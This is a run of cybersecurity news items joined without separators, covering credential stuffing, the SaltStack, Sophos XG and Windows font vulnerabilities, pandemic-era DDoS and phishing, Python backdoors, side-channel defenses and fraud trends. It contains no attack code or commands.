Much of the value in media industry accounts lies in the potential access to both compromised assets, like premium content, along with personal data according to Steve Ragan, author of the report.
“We’ve observed a trend in which criminals are combining credentials from a media account with access to stolen rewards points from local restaurants and marketing the nefarious offering as ‘date night’ packages. Once the criminals get a hold of the geographic location information in the compromised accounts, they can match them up to be sold as dinner and a movie,” Ragan explained in the report.
Attacks targeting published content
Video sites are not the sole focus of credential stuffing attacks within the media industry, however. The report notes a 7,000% increase in attacks targeting published content.
Newspapers, books and magazines sit squarely within the sights of cybercriminals, indicating that media of all types appear to be fair game when it comes to these types of attacks.
The United States was by far the top source of credential stuffing attacks against media companies with 1.1 billion in 2019, an increase of 162% over 2018. France and Russia were a distant second and third with 3.9 million and 2.4 million attacks, respectively.
India, was the most targeted country in 2019, enduring with 2.4 billion credential stuffing attacks. It was followed by the United States at 1.4 billion and the United Kingdom at 124 million.
“As long as we have usernames and passwords, we’re going to have criminals trying to compromise them and exploit valuable information,” Ragan explained.
“Password sharing and recycling are easily the two largest contributing factors in credential stuffing attacks. While educating consumers on good credential hygiene is critical to combating these attacks, it’s up to businesses to deploy stronger authentication methods and identify the right mix of technology, policies and expertise that can help protect customers without adversely impacting the user experience.”
Some of the shuffling of top target areas in Q1 2020 correlate with effects of the pandemic lockdowns in various parts of the world
Spike in malicious login attempts against European broadcasters
There was a large spike in malicious login attempts against European video service providers and broadcasters during the first quarter of 2020. One attack in late March, after many isolation protocols had been instituted, directed nearly 350,000,000 attempts against a single service provider over a 24-hour period.
Separately, one broadcaster well known across the region, was hit with a barrage of attacks over the course of the quarter with peaks that ranged in the billions.
Another noteworthy trend during the first quarter was the number of criminals sharing free access to newspaper accounts. Often offered as self-promotional vehicles, credential stuffing campaigns must still be initiated in order to steal the working username and password combinations that are given away.
Researchers also observed a decline in the cost of stolen account credentials over the course of the quarter, which traded for approximately $1 to $5 at the start and $10 to $45 for package offers of multiple services. Those prices fell as new accounts and lists of recycled credentials populated the market.
The revelation was made on Thursday, when Cisco published an advisory saying that, on May 7, 2020, they’ve discovered the compromise of six of their salt-master servers, which are part of the Cisco VIRL-PE (Internet Routing Lab Personal Edition) service infrastructure.
About SaltStack Salt, the vulnerabilities, and the problem with patching
SaltStack Salt is open source software that is used for managing and monitoring servers in datacenters and cloud environments. It is installed on a “master” server and it manages “minion” servers via an API agent.
The two recently revealed vulnerabilities – CVE-2020-11651 (an authentication bypass flaw) and CVE-2020-11652 (a directory traversal flaw) – can be exploited by unauthenticated, remote attackers to achieve RCE as root on both masters and minions.
The flaws were fixed in late April, but not all exposed Salt servers have been patched. A few weeks ago, Censys put the number of potentially vulnerable, internet-exposed Salt servers at 2,928.
One of the things that likely prolonged the deployment of patches is the fact that Salt is integrated in other solutions, and developers of those solutions took some time to push out security updates.
VMware vRealize Operations Manager is one of those solutions, and so are two network architecture modeling and testing solutions by Cisco.
“Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) incorporate a version of SaltStack that is running the salt-master service that is affected by these vulnerabilities,” Cisco shared.
“Cisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE. Those servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.”
The company has remediated the affected servers on the same day and has provided software updates that address these vulnerabilities, so that enterprise admins that installed these solutions on-premises can fix them.
For more information about which software releases are affected and under what conditions, admins should peruse the advisory, which also offers some workarounds.
Cisco did not say what the attackers ultimate goal was, but in previously disclosed attacks, their intent was to install cryptocoin miners.
Sophos has released an emergency hotfix for an actively exploited zero-day SQL injection vulnerability in its XG Firewalls, and has rolled it out to all units with the auto-update option enabled.
Aside from plugging the security hole, the hotfix detects if the firewall was hit by attackers and, if it was, stops it from accessing any attacker infrastructure, cleans up remnants from the attack, and notifies administrators about it so that they can perform additional remediation steps.
About the vulnerability and the attack
The flaw, which has yet to be assigned a CVE identification number, was previously unknown to Sophos and turned out to be a pre-auth SQL injection vulnerability that was exploited for remote code execution.
The zero-day affects all versions of XG Firewall firmware on both physical and virtual Sophos firewalls.
“Sophos received a report on April 22, 2020, at 20:29 UTC regarding an XG Firewall with a suspicious field value visible in the management interface. Sophos commenced an investigation and the incident was determined to be an attack against physical and virtual XG Firewall units,” the company shared.
“The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected.”
The company says that the attack used a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for SFOS, the Sophos Firewall Operating System (i.e., the firmware).
The goal of the attack was to deliver malware that is able to collect information such as:
- The firewall’s public IP address
- Its license key
- The email addresses of user accounts that were stored on the device as well as that of the administrator account
- Firewall users’ names, usernames, the encrypted form of the passwords, and the salted SHA256 hash of the administrator account’s password
- A list of the user IDs permitted to use the firewall for SSL VPN and accounts that were permitted to use a “clientless” VPN connection
- Additional information about the firewall (e.g., firmware version, CPU type, etc.)
- A list of the IP address allocation permissions for the users of the firewall
All this information was written in a file, which was compressed, encrypted, and uploaded to a remote machine controlled by the attacker(s).
Those admins that have disabled the (default) auto-update option are advised to implement the hotfix.
The admins whose firewalls have been compromised should reset device administrator accounts, reboot the affected device(s), reset passwords for all local user accounts and for any accounts where the XG credentials might have been reused.
Sophos also advises admins to reduce attack surface by disabling HTTPS Admin Services and User Portal access on the WAN interface (if possible).
“While customers should always conduct their own internal investigation, at this point Sophos is not aware of any subsequent remote access attempts to impacted XG devices using the stolen credentials,” the company added.
The coronavirus pandemic is upending everything we know. As the tally of infected people grows by the hour, global healthcare, economic, political, and social systems are bending and breaking under the strain, and for much of the world there’s no end in sight. But amid this massive wave of disruption, one thing hasn’t changed: the eagerness of cybercriminals to capitalize on society’s misfortune and uncertainty to sabotage, cripple, mislead and steal.
New states of emergency are being declared every day as the virus keeps spreading. Confirmed cases have meanwhile been reported in more than 150 countries on six different continents. Nations and organizations everywhere are working around the clock to flatten the COVID-19 curve by imposing remote work policies, travel bans, and self-isolation.
In an unprecedented time like this, the reliance on the Internet is growing exponentially, turning the data highway into an even more indispensable channel for communication, information sharing, commerce, and everyday social interaction.
The Internet lifeline
To prevent their phone lines from being overwhelmed with information requests, governments around the globe are making digital the default communication stream and directing citizens to the official websites of their health ministries or public health agencies for COVID-19 updates. People are hitting Facebook and other social media like never before to keep up with and share the latest news. Telecom giant Vodafone has reported a 50% surge in European internet use, and Netflix has been requested to cut its bitrate in Europe for 30 days in order to prevent the Internet from collapsing.
In this context, a cyberattack that denies organizations or families access to their devices or data could be catastrophic. In a worst-case scenario, one or more cyberattacks could cause broad-based infrastructure shutdowns that take whole communities or cities offline and further hinder already overburdened healthcare providers, transportation systems and networks.
Germany, Italy and Spain are among the many countries and jurisdictions (like New York and California) that have implemented draconian measures to limit the spread of the COVID-19 virus. Non-essential businesses have been made to close, and people to stay at home. Consequently, citizens are relying heavily on delivery services, which continue to operate. However, in Germany, cybercriminals recently unleashed a DDoS attack on one of the largest home delivery platforms, which affected customers and owners of more than 15,000 restaurants across the country. The criminals asked for two bitcoins (worth roughly $11,000) to stop the siege.
A few days earlier, the U.S. Department of Health and Human Services (HHS) suffered a DDoS attack, assumed to have been launched by a hostile foreign actor, aimed at slowing down the agency’s services amid the government’s rollout of a response to coronavirus. The incident allegedly tried to overload HHS servers with millions of hits in just hours. The attack in the US occurred just two weeks after Australia’s federal cyber agency warned that Australian banks were in the crosshairs of extensive DDoS extortion campaigns.
Especially digitally-advanced industries with a heavy dependence on internet connectivity are more vulnerable than ever. Europol’s “Internet Organised Crime Threat Assessment 2019” report notes that – besides the public sector and financial institutions – travel agents, Internet infrastructure, e-commerce, and online gaming services were lucrative targets for DDoS extortionists.
The perils of DDoS attacks on VPN servers
When it comes to remote work, VPN servers turn into bottlenecks. Keeping them secure and available is a number-one IT priority. Hackers can launch DDoS campaigns on VPN services and deplete their resources, knocking out the VPN server and limiting its availability. The implications are clear: Since the VPN server is the gateway to a company’s internal network, an outage can keep all employees working remotely from doing their job, effectively cutting off the entire organization from the outside world.
During an unprecedented time of peak traffic, the risk of a DDoS attack is growing exponentially. If the utilization of the available bandwidth is very high, it does not take much to cause an outage. In fact, even a tiny attack can become the last nail in the coffin. For instance, a VPN server or firewall can be taken down by a TCP blend attack with an attack volume as low as 1 Mbps. SSL-based VPNs are just as vulnerable to an SSL flood attack, as are web servers.
Making matters worse, many organizations either use in-house hardware appliances or rely on their Internet carrier to ward off incoming attacks. These deployment models tend to run with low levels of automation, requiring human intervention of some sort to operate. If someone or something throws a digital wrench into the system, fixing the problem remotely will be an uphill battle if there are few or no IT staff on-site. Since these deployment models typically require 10 or even 20 minutes before they even detect an incident, any attack will almost inevitably cause a major outage.
APIs and web apps broaden the attack surface
The Application Programming Interface (API) is a key part of every cloud service or web app. APIs enable service integration and interoperability – by, for instance, enabling any given app to process a payment from PayPal or a client’s credit account in order to complete the transaction. But they can also turn into single point of failure that expose companies to a wide variety of risks and vulnerabilities. When a business-critical application or API is compromised, it knocks out all the operations related to the business and initiates a potentially devastating chain reaction.
Guarding against or managing application layer attacks – such as an HTTP/HTTPS flood – is especially difficult, as the malicious traffic is hard to distinguish from regular traffic. Layer-7 attacks are in that sense highly effective, as they require little bandwidth to create a blackout.
Cybercrime exploits anxiety
Cybercriminals take advantage of human foibles to break through systemic defenses. In a crisis, especially if prolonged, IT people run the risk of making mistakes they would not have made otherwise. Attackers might cut off system administrators from their own servers while they run virtually rampant through the company network, steal proprietary data, or ingest ransomware. Any downtime can alienate customers, erode trust and cause negative publicity, even anxiety.
Organizations should remain vigilant and prepare for attacks in advance, before they occur, as this sort of incident can be very difficult to respond to once the attack unfolds. Companies should also continue to opt for cloud services to take advantage of scalability, and higher bandwidth to maintain redundancy. Most importantly, during times of remote work and self-isolation, radical security automation is more important than ever in order to ensure an instant response and get human error out of the equation.
“Elite” hackers have tried – and failed – to breach computer systems and networks of the World Health Organization (WHO) earlier this month, Reuters reported on Monday.
In fact, since the start of the COVID-19 pandemic, the WHO has been fielding an increasing number of cyberattacks, as well as impersonation attempts.
About the attack
The attackers created a malicious site mimicking the WHO’s internal email system in an attempt to phish the agency staffers’ email credentials.
What the attackers were after and who they were is not known, although some sources suspect them to be the Darkhotel espionage crew, which has been active for nearly over decade and whose targets are usually high-profile individuals: executives in various sectors, including defense and energy, and government employees. (The sources did not say why they are inclined to point the finger at the Darkhotel threat actors.)
Costin Raiu, head of global research and analysis at Kaspersky, said that the malicious web infrastructure used in this attack had also been used to target other healthcare and humanitarian organizations in recent weeks.
Coronavirus researchers are being targeted
The Canadian Centre for Cyber Security has also been warning Canadian health organizations about cyber criminals and spies.
“[Sophisticated threat actors] may attempt to gain intelligence on COVID-19 response efforts and potential political responses to the crisis or to steal ongoing key research towards a vaccine or other medical remedies, or other topics of interest to the threat actor,” the federal agency noted.
“Cyber criminals may take advantage of the COVID-19 pandemic, using the increased pressure being placed on Canadian health organizations to extract ransom payments or mask other compromises.”
The agency advised healthcare organizations to be on the lookout for social engineering and spear-phishing attempts and that attackers could exploit critical vulnerabilities and/or compromised credentials.
They also urged all organizations to “become familiar with and practice their business continuity plans, including restoring files from back-ups and moving key business elements to a back-up infrastructure,” and have provided a list of critical vulnerabilities that should be patched and/or mitigated as soon as possible.
Healthcare organizations previously hit
Cybercriminals wielding ransomware have already hit some healthcare organizations involved in the fight against the COVID-19 virus.
While the latter managed to repel the attack and did not suffer downtime, the attackers published some of the medical data they stole. They later removed the leaked files.
Python backdoor attacks are increasingly common. Iran, for example, used a MechaFlounder Python backdoor attack against Turkey last year. Scripting attacks are nearly as common as malware-based attacks in the United States and, according to the most recent Crowdstrike Global Threat Report, scripting is the most common attack vector in the EMEA region.
Python’s growing popularity among attackers shouldn’t come as a surprise. Python is a simple but powerful programming language. With very little effort, a hacker can create a script of less than 100 lines that establishes persistence, so that even if you kill the process, it will start itself back up, establish a backdoor, obfuscate communications both internally and with external servers and set up command and control links. And if an attacker doesn’t want to write the code, that’s no problem either. Python backdoor scripts are easy to find – a simple GitHub search turns up more than 200.
Scripting attacks are favored by cybercriminals and nation states because they are hard to detect by endpoint detection and response (EDR) systems. Python is heavily used by admins, so malicious Python traffic looks exactly like the traffic produced by day-to-day network management tools.
It’s also fairly easy to get these malevolent scripts onto targeted networks. Simply include a malicious script in a commonly used library, change the file name by a single character and, undoubtedly, someone will use it by mistake or include it as a dependency in some other library. That’s particularly insidious, given how enormous the list of dependencies can be in many libraries.
By adding a bit of social engineering, attackers can successfully compromise specific targets. If an attacker knows the StackOverflow usernames of some of the admins at their targeted organization, he or she can respond to a question with ready-to-copy Python code that looks completely benign. This works because many of us have been “trained” by software companies to copy and paste code to deploy their software. Everyone knows it isn’t safe, but admins are often pressed for time and do it anyway.
Anatomy of a Python backdoor attack
Now, let’s imagine a Python backdoor has established itself on your network. How will the attack play out?
First, it will probably try to establish persistence. There are many ways to do this, but one of the easiest is to establish a crontab that restarts the script, even if it’s killed. To stop the process permanently, you’ll need to kill it and the crontab in the right sequence at the right time. Then it will make a connection to an external server to establish command and control, obfuscating communications so they look normal, which is relatively easy to do since its traffic already resembles that of ordinary day-to-day operations.
At this point, the script can do pretty much anything an admin can do. Scripting attacks are often used as the point of the spear for multi-layered attacks, in which the script downloads malware and installs it throughout the environment.
Fighting back against Python backdoors
Scripting attacks often bypass traditional perimeter and EDR defenses. Firewalls, for example, use approved network addresses to determine whether traffic is “safe,” but it can’t verify exactly what is communicating on either end. As a result, scripts can easily piggyback on approved firewall rules. As for EDR, traffic from malicious scripts is very similar to that produced by common admin tools. There’s no clear signature for EDR defenses to detect.
The most efficient way to protect against scripting attacks is to adopt an identity-based zero trust approach. In a software identity-based approach, policies are not based on network addresses, but rather on a unique identity for each workload. These identities are based on dozens of immutable properties of the device, software or script, such as a SHA-256 hash of the binary, the UUID of the bios or a cryptographic hash of a script.
Any approach that’s based on network addresses cannot adequately protect the environment. Network addresses change frequently, especially in autoscaling environments such as the cloud or containers, and as mentioned earlier, attackers can piggyback on approved policies to move laterally.
With a software and machine identity-based approach, IT can create policies that explicitly state which devices, software and scripts are allowed to communicate with one another — all other traffic is blocked by default. As a result, malicious scripts would be automatically blocked from establishing backdoors, deploying malware or communicating with sensitive assets.
Scripts are rapidly becoming the primary vector for bad actors to compromise enterprise networks. By establishing and enforcing zero trust based on identity, enterprises can shut them down before they have a chance to establish themselves in the environment.
Attackers are exploiting two new zero-days in the Windows Adobe Type Manager Library to achieve remote code execution on targeted Windows systems, Microsoft warns.
The attacks are limited and targeted, the company noted, and provided workarounds to help reduce customer risk until a fix is developed and released.
More about the new Windows zero-days
According to the security advisory published on Monday, the vulnerabilities arise from the affected library’s improper handling of a specially-crafted multi-master font – Adobe Type 1 PostScript format.
“There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane,” the company shared, and said that the Outlook Preview Pane is not an attack vector for this vulnerability.
The flaws affect:
- Windows 10
- Windows 8.1
- Windows 7
- Windows RT 8.1
- Windows Server 2008
- Windows Server 2008 R2
- Windows Server 2012
- Windows Server 2012 R2
- Windows 2016
- Windows Server 2019
- Windows Server, version 1803
- Windows Server, version 1903
- Windows Server, version 1909
“For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities,” Microsoft added.
Mitigations and workarounds
Enhanced Security Configuration, which is on by default on Windows Servers, does not mitigate the vulnerabilities.
Offered workarounds include disabling the Preview Pane and Details Pane in Windows Explorer, disabling the WebClient service, and renaming the ATMFD.DLL file. Microsoft explains how to do all that and the impacts of these workarounds in the security advisory.
The company did not offer more details about the attacks nor did it say when the security updates will be released, but has noted that to receive them for Windows 7, Windows Server 2008, or Windows Server 2008 R2 users will have to have an Extended Security Updates (ESU) license.
Purdue University innovators have unveiled technology that is 100 times more resilient to electromagnetic and power attacks, to stop side-channel attacks against IoT devices.
Securing IoT devices against side-channel attacks
Security of embedded devices is essential in today’s internet-connected world. Security is typically guaranteed mathematically using a small secret key to encrypt the private messages.
When these computationally secure encryption algorithms are implemented on a physical hardware, they leak critical side-channel information in the form of power consumption or electromagnetic radiation. Now, Purdue University innovators have developed technology to kill the problem at the source itself – tackling physical-layer vulnerabilities with physical-layer solutions.
Recent attacks have shown that such side-channel attacks can happen in just a few minutes from a short distance away. Recently, these attacks were used in the counterfeiting of e-cigarette batteries by stealing the secret encryption keys from authentic batteries to gain market share.
“This leakage is inevitable as it is created due to the accelerating and decelerating electrons, which are at the core of today’s digital circuits performing the encryption operations,” said Debayan Das, a Ph.D. student in Purdue’s College of Engineering.
“Such attacks are becoming a significant threat to resource-constrained edge devices that use symmetric key encryption with a relatively static secret key like smart cards. Our technology has been shown to be 100 times more resilient to these attacks against Internet of Things devices than current solutions.”
The team developed technology to use mixed-signal circuits to embed the crypto core within a signature attenuation hardware with lower-level metal routing, such that the critical signature is suppressed even before it reaches the higher-level metal layers and the supply pin. Das said this drastically reduces electromagnetic and power information leakage.
“Our technique basically makes an attack impractical in many situations,” Das said. “Our protection mechanism is generic enough that it can be applied to any cryptographic engine to improve side-channel security.”
There has been a major spike in human-driven attacks – which rose 90% compared to six months previously, according to Arkose Labs.
Changing attack patterns were felt across geographies and industries, at a time of the year when digital commerce was at its peak.
In Q4 of 2019, advanced, multi-step attacks attempting to evade fraud defenses using a blend of automated and human-driven attacks have been detected. Automated fraud attacks, which grew by 25%, are becoming increasingly complex as fraudsters become more effective at mimicking trusted customer behavior.
While automated attacks are still prevalent across most industries, the notable rise in human-driven attacks is attributed to fraudsters leveraging what Arkose Labs define as “sweatshop-like workers” to enhance attacks.
Sweatshop-driven attack levels increased during high online traffic periods as fraudsters attempted to blend in with legitimate traffic, with peak attack levels 50% higher than seen in Q2 of 2019.
The key countries where human-driven attacks originated from shifted in Q4, showing fraudsters tapping into human farms across the globe to keep costs low and profits high. Sweatshop-driven attacks from Venezuela, Vietnam, Thailand, India and Ukraine grew, while attacks from the Philippines, Russia and Ukraine almost tripled compared to Q2 2019.
“Notable shifts are occurring in today’s threat landscape, with fraudsters no longer looking to make a quick buck and instead opting to play the long game, implementing multi-step attacks that don’t initially reveal their fraudulent intent,” said Kevin Gosschalk, CEO of Arkose Labs.
“Fraudsters are increasingly augmenting their attacks by outsourcing activity to human sweatshop resources, causing a surge in fraud within certain industries such as online gaming and social media.”
Attacks on social media platforms are increasingly human-driven
Due to the volume of rich personal data on social media platforms and high user activity levels, social applications are lucrative targets for fraudsters looking to scrape content, write fake reviews, steal information or disseminate spam and malicious content.
In Q4 of 2019, there was a sharp increase in attack volumes for both social media account registrations and logins. In fact, every two in five login attempts and every one in five new account registrations were fraudulent, making this one of the highest industry attack rates.
The human versus automated attack mix also rose, with more than 50% of social media login attacks being human-driven.
“The elevated rate of human-driven login attacks is supported by organized sweatshops, with fraudsters attempting to hack into legitimate users’ accounts to manipulate or steal credentials and disseminate spam,” explained Vanita Pandey, VP of Marketing and Strategy at Arkose Labs.
“With two in every five social media logins being an attack and more than half of those attacks being human-driven, it’s clear that fraudsters are targeting this customer touchpoint with hopes of downstream monetization.”
Online gaming has emerged as a lucrative channel for fraudsters
As millions increasingly engage in online gaming, the industry has emerged as a prime target for fraudsters across the globe.
Gaming fraud in Q4 of 2019 demonstrated highly sophisticated attack patterns in comparison to other industries, with fraudsters leveraging gaming applications to use stolen payment methods, steal in-game assets, abuse the auction houses and disseminate malicious content.
Fraudsters are using bots to build online gaming account profiles and sell accounts with higher levels and assets, while also targeting online currencies used within select games. Overall, the report found that online gaming attack rates grew 25% last quarter, with most of the growth coming from human-driven attacks on new account registrations and logins.
Combating cybercrime requires a zero tolerance approach
Rising human-driven attack rates demonstrate that fraudsters are willing to be creative and invest more in their attacks, often laying the groundwork months in advance using lower cost, automated attacks.
As long as there is money to be made in fraud and businesses continue to tolerate attacks, fraudsters will continue to identify the most effective attack methods to achieve optimal ROI.
“Ultimately, the only sustainable approach to combating cybercrime is adopting a zero tolerance approach that undermines the economic incentives behind fraud. Tolerating fraud as ‘the cost of doing business’ exacerbates the problem long-term,” said Gosschalk.
“To identify the subtle, tell-tale signs that predict downstream fraud, organizations must prioritize in-depth profiling of activity across all customer touchpoints. By combining digital intelligence with targeted friction, large-scale attacks will quickly become unsustainable for fraudsters.”